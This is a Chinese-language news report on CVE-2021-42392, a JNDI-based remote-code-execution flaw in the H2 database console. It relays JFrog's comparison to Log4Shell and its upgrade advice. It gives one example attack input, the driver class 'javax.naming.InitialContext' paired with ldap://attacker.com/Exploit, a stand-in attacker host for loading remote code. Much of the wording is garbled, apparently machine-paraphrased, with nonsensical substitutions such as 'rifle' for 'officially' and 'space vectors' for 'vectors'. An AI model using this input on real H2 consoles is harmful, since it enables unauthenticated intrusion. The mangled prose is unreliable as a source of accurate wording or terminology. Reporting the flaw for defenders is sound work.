安全性科研工作人员警示称,一个全新的比较严重的Java不正确,其实质与现阶段在全世界范畴内利用的灭绝人性的 Log4Shell 漏洞同样 。
CVE-2021-42392 并未在国家漏洞数据库 (NVD) 中正式步枪公布,但据软件行业内JFrog 称,它危害了受欢迎的H2 Java SQL 数据库的控制台。
这个安全性企业提示,一切现阶段运作的裸露于其 LAN 或 WAN 的 H2 控制台的机构马上将数据库升级到 2.0.206 版本,不然网络攻击很有可能会利用它开展没经身份认证的远程控制执行命令 (RCE)。
与 Log4Shell 一样,该不正确与 JNDI(Java 取名和文件目录插口)“远程控制类载入”相关。JNDI 是一种为 Java 应用软件给予取名和文件目录作用的 API。这代表假如网络攻击可以将故意 URL 获得到 JNDI 搜索中,它就可以开启 RCE。
“简单点来说,直接原因类似 Log4Shell——H2 数据库架构中的好几个编码途径将没经过虑的网络攻击操纵的 URL 传送给 javax.naming.Context.lookup 函数公式,该函数容许远程控制代码库载入(AKA Java 编码引入 AKA远程控制执行命令),” JFrog 表述道。
“从总体上,org.h2.util.JdbcUtils.getConnection 方式以推动类名和数据库 URL 做为主要参数。假如驱动软件的类可分派给 javax.naming.Context 类,则该方式会从这当中创建对象一个目标并启用其搜索方式。”
给予例如“javax.naming.InitialContext”之类的驱动软件类和像 ldap://attacker.com/Exploit 那样简洁的 URL 将造成远程控制执行命令。
JFrog 表明,该漏洞尤其风险,由于 H2 数据库包尤其受大家喜爱。该企业宣称,它是前 50 个最火爆的 Maven 程序包之一,有着近 7000 个产品工件依靠项。
可是,有一些缘故造成利用不容易像 Log4Shell 那般普遍。一方面,它具备“立即危害范畴”,这代表着易受攻击的网络服务器应当更易于寻找。次之,在大部分 H2 桌面操作系统中,控制台只监视 localhost 联接,这代表着默认是不能利用的。
“很多经销商很有可能已经运作 H2 数据库,但沒有运作 H2 控制台,尽管除开控制台以外也有别的空间向量可以利用这个问题,但这种别的空间向量是取决于前后文的,不大可能曝露给远程控制网络攻击。”JFrog 填补道。